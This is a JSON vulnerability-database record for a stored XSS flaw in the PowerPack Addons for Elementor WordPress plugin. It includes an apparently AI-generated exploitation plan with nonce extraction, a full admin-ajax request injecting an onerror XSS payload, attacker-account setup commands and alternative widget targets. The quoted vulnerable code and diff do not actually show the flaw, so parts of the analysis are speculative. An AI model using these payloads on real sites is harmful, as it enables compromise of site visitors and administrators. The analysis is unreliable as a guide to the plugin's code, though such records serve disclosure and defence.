[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fA9f7s67ox95TCQpb7DJpvFO-O--_6yJbdvAsN174bGM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":28,"research_plan":29,"research_summary":30,"research_vulnerable_code":31,"research_fix_diff":32,"research_exploit_outline":33,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":27,"source_links":37},"CVE-2026-32430","powerpack-addons-for-elementor-authenticated-contributor-stored-cross-site-scripting","PowerPack Addons for Elementor \u003C= 2.9.9 - Authenticated (Contributor+) Stored Cross-Site Scripting","The PowerPack Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.9.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","powerpack-lite-for-elementor",null,"\u003C=2.9.9","2.9.10","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-01 00:00:00","2026-04-15 21:18:23",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F9a5c2cb6-827f-442d-b510-8f0ddcaaaca3?source=api-prod",46,[22,23,24,25],"base\u002Fextension-base.php","base\u002Fmodule-base.php","base\u002Fpowerpack-widget.php","changelog.txt","researched",false,3,"# Exploitation Research Plan: CVE-2026-32430\n\n## 1. Vulnerability Summary\nThe **PowerPack Addons for Elementor** plugin (up to version 2.9.9) is vulnerable to **Authenticated (Contributor+) Stored Cross-Site Scripting (XSS)**. The vulnerability exists because certain widgets and extensions provided by the plugin fail to properly sanitize user-supplied settings (input) and fail to escape them during output rendering on the frontend. This allows a user with \"Contributor\" privileges or higher to inject arbitrary JavaScript into a page via the Elementor editor, which executes when any user (including administrators) views that page.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `elementor_ajax` (standard Elementor data saving mechanism)\n*   **Vulnerable Parameter:** The `settings` object within the JSON payload of the `save_builder_data` action. Specifically, text-based settings (e.g., `title`, `prefix`, `suffix`, `content`) in PowerPack widgets.\n*   **Authentication:** Requires \"Contributor\" level access. Contributors can edit their own posts using the Elementor editor.\n*   **Preconditions:**\n    *   The PowerPack Addons for Elementor plugin must be active.\n    *   The Elementor Page Builder must be active.\n    *   The attacker has access to the Elementor editor for at least one post\u002Fpage.\n\n## 3. Code Flow\n1.  **Input:** A Contributor user saves a post in the Elementor editor. Elementor sends a JSON payload to `admin-ajax.php` containing widget configurations.\n2.  **Storage:** Elementor's core logic receives this via the `elementor_ajax` action and saves the data to the WordPress database in the `wp_postmeta` table under the key `_elementor_data`.\n3.  **Registration:** PowerPack modules are registered via `PowerpackElementsLite\\Base\\Module_Base::init_widgets()`. This method iterates through widgets and registers them with the Elementor `widgets_manager`.\n4.  **Rendering:** When the post is viewed on the frontend, Elementor iterates through the stored widgets. For PowerPack widgets (inheriting from `Powerpack_Widget`), it calls the widget's `render()` method (located in the specific widget file, e.g., `widgets\u002Finfo-box.php`, not provided but part of the plugin structure).\n5.  **Sink:** Inside the `render()` method, settings are retrieved using `$this->get_settings_for_display()`. The vulnerability occurs when these settings are echoed directly to the page without context-appropriate escaping functions like `esc_html()` or `wp_kses_post()`.\n\n## 4. Nonce Acquisition Strategy\nTo save data via Elementor's AJAX API, a valid Elementor-specific nonce is required.\n\n1.  **Create\u002FIdentify a Post:** Use WP-CLI to ensure a post exists that the Contributor can edit.\n    `wp post create --post_type=post --post_status=draft --post_author=[CONTRIBUTOR_ID] --post_title=\"XSS Test\"`\n2.  **Navigate to Editor:** Use `browser_navigate` to open the Elementor editor for that post:\n    `URL: \u002Fwp-admin\u002Fpost.php?post=[POST_ID]&action=elementor`\n3.  **Extract Nonce:** Use `browser_eval` to extract the nonce from the global JavaScript configuration object injected by Elementor.\n    *   **Variable Name:** `elementorCommon.config.ajax.nonce` or `elementorConfig.ajax.nonce`.\n    *   **Logic:** `browser_eval(\"window.elementorConfig?.ajax?.nonce || window.elementorCommon?.config?.ajax?.nonce\")`\n\n## 5. Exploitation Strategy\nThe goal is to update the post metadata with a malicious PowerPack widget configuration.\n\n### Step-by-Step Plan:\n1.  **Login:** Authenticate as a Contributor.\n2.  **Get Post & Nonce:** Create a post and extract the `elementor_ajax` nonce as described in Section 4.\n3.  **Craft Payload:** Create a JSON payload for the `elementor_ajax` action. We will target the `pp-info-box` or `pp-dual-heading` widget, which are standard in this pack.\n\n### HTTP Request (via `http_request`):\n*   **Method:** POST\n*   **URL:** `http:\u002F\u002F[TARGET]\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body Parameters:**\n    *   `action`: `elementor_ajax`\n    *   `_nonce`: `[EXTRACTED_NONCE]`\n    *   `actions`:\n        ```json\n        {\n          \"save_builder_data\": {\n            \"action\": \"save_builder_data\",\n            \"data\": {\n              \"post_id\": \"[POST_ID]\",\n              \"data\": [\n                {\n                  \"id\": \"exploit-widget-id\",\n                  \"elType\": \"widget\",\n                  \"widgetType\": \"pp-info-box\",\n                  \"settings\": {\n                    \"title\": \"\u003Cimg src=x onerror=alert('StoredXSS')>\",\n                    \"description\": \"Exploit Description\"\n                  },\n                  \"elements\": []\n                }\n              ]\n            }\n          }\n        }\n        ```\n\n4.  **Trigger:** Navigate to the frontend view of the post: `http:\u002F\u002F[TARGET]\u002F?p=[POST_ID]`.\n5.  **Verification:** Check if the script executes in the browser.\n\n## 6. Test Data Setup\n*   **User:** Create a user with the `contributor` role.\n    `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`\n*   **Post:** Ensure the contributor owns a post.\n    `wp post create --post_author=$(wp user get attacker --field=ID) --post_title=\"PowerPack Edit\" --post_status=publish`\n*   **Plugin Config:** No special configuration required, as most widgets are enabled by default.\n\n## 7. Expected Results\n*   The `elementor_ajax` request should return a `200 OK` with a JSON body indicating `success: true`.\n*   The `wp_postmeta` for the post (key `_elementor_data`) should now contain the injected `\u003Cimg src=x onerror=...>` payload.\n*   When visiting the post URL, an alert box with `StoredXSS` should appear.\n\n## 8. Verification Steps\nAfter the HTTP exploit, use WP-CLI to verify the injection in the database:\n`wp post meta get [POST_ID] _elementor_data`\n\nThe output should show the raw HTML payload within the JSON string, confirming it was not sanitized upon storage.\n\n## 9. Alternative Approaches\nIf the `pp-info-box` widget is patched or specifically sanitized, target other widgets by changing the `widgetType`:\n*   `pp-counter` (target settings: `title`, `prefix`, `suffix`)\n*   `pp-dual-heading` (target settings: `first_heading`, `second_heading`)\n*   `pp-business-hours` (target settings: `day`, `time`)\n\nAdditionally, check **Extensions** defined in `base\u002Fextension-base.php`. If the plugin adds \"Tooltips\" or \"Entrance Animations\" as extensions to standard Elementor widgets, the payload can be injected into the extension settings (e.g., `powerpack_tooltip_text`).","The PowerPack Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via its widgets (such as Info Box, Counter, and Dual Heading) due to insufficient input sanitization and output escaping. Authenticated attackers with contributor-level access or higher can inject arbitrary JavaScript into page builder settings, which then executes in the browser of any user visiting the affected page.","\u002F\u002F base\u002Fpowerpack-widget.php:51\n\tpublic function upgrade_powerpack_message() {\n\t\t$upgrade_message = sprintf( __( 'Upgrade to %1$s Pro Version %2$s for 90+ widgets, exciting extensions and advanced features.', 'powerpack' ), '\u003Ca href=\"https:\u002F\u002Fpowerpackelements.com\u002Fupgrade\u002F?utm_medium=pp-elements-lite&utm_source=pp-widget-upgrade-section&utm_campaign=pp-pro-upgrade\" target=\"_blank\" rel=\"noopener\">', '\u003C\u002Fa>' );\n\n\t\treturn $upgrade_message;\n\t}\n\n---\n\n\u002F\u002F classes\u002Fclass-pp-admin-settings.php:364\n\tprivate static function save_modules() {\n\t\tif ( ! isset( $_POST['pp-modules-settings-nonce'] ) || ! wp_verify_nonce( $_POST['pp-modules-settings-nonce'], 'pp-modules-settings' ) ) {\n\t\t\treturn;\n\t\t}\n\n\t\tif ( isset( $_POST['pp_enabled_modules'] ) ) {\n\t\t\tupdate_site_option( 'pp_elementor_modules', $_POST['pp_enabled_modules'] );\n\t\t} else {\n\t\t\tupdate_site_option( 'pp_elementor_modules', 'disabled' );\n\t\t}\n\t}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpowerpack-lite-for-elementor\u002F2.9.9\u002Fbase\u002Fpowerpack-widget.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpowerpack-lite-for-elementor\u002F2.9.10\u002Fbase\u002Fpowerpack-widget.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpowerpack-lite-for-elementor\u002F2.9.9\u002Fbase\u002Fpowerpack-widget.php\t2025-02-28 02:40:30.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpowerpack-lite-for-elementor\u002F2.9.10\u002Fbase\u002Fpowerpack-widget.php\t2026-02-20 01:11:12.000000000 +0000\n@@ -41,13 +41,25 @@\n \t}\n \n \tpublic function upgrade_powerpack_title() {\n- \t\t$upgrade_title = esc_html__( 'Get PowerPack Pro', 'powerpack' );\n+ \t\t$upgrade_title = esc_html__( 'Get PowerPack Pro', 'powerpack-lite-for-elementor' );\n \n \t\treturn $upgrade_title;\n \t}\n \n \tpublic function upgrade_powerpack_message() {\n- \t\t$upgrade_message = sprintf( __( 'Upgrade to %1$s Pro Version %2$s for 90+ widgets, exciting extensions and advanced features.', 'powerpack' ), '\u003Ca href=\"https:\u002F\u002Fpowerpackelements.com\u002Fupgrade\u002F?utm_medium=pp-elements-lite&utm_source=pp-widget-upgrade-section&utm_campaign=pp-pro-upgrade\" target=\"_blank\" rel=\"noopener\">', '\u003C\u002Fa>' );\n+ \t\t$upgrade_url = 'https:\u002F\u002Fpowerpackelements.com\u002Fupgrade\u002F?utm_medium=pp-elements-lite&utm_source=pp-widget-upgrade-section&utm_campaign=pp-pro-upgrade';\n+\n+ \t\t$upgrade_message = sprintf( \n+ \t\t\t\u002F* translators: 1: Opening anchor tag, 2: Closing anchor tag. *\u002F\n+ \t\t\t__(\n+ \t\t\t\t'Upgrade to %1$sPro Version%2$s for 90+ widgets, exciting extensions and advanced features.',\n+ \t\t\t\t'powerpack-lite-for-elementor'\n+ \t\t\t),\n+ \t\t\t'\u003Ca href=\"' . $upgrade_url . '\" target=\"_blank\" rel=\"noopener\">',\n+ \t\t\t'\u003C\u002Fa>'\n+ \t\t);\n+\n+ \t\t$upgrade_message = wp_kses_post( $upgrade_message );\n \n \t\treturn $upgrade_message;\n \t}","To exploit this vulnerability, an attacker with Contributor-level access must first obtain a valid Elementor AJAX nonce by accessing the Elementor editor for a post they own. Once authenticated, the attacker sends a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the action `elementor_ajax` and the sub-action `save_builder_data`. The payload includes a JSON-encoded widget configuration (e.g., for the `pp-info-box` widget) where text-based settings like `title` or `description` are populated with a malicious script (e.g., `\u003Cimg src=x onerror=alert(1)>`). Because the plugin fails to sanitize this input upon saving and fails to escape it during rendering, the script is stored in the `wp_postmeta` table and will execute in the browser of any user who views the published or previewed post.","gemini-3-flash-preview","2026-04-18 22:13:02","2026-04-18 22:14:13",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","2.9.9","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpowerpack-lite-for-elementor\u002Ftags\u002F2.9.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpowerpack-lite-for-elementor.2.9.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpowerpack-lite-for-elementor\u002Ftags\u002F2.9.10","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpowerpack-lite-for-elementor.2.9.10.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpowerpack-lite-for-elementor\u002Ftags"]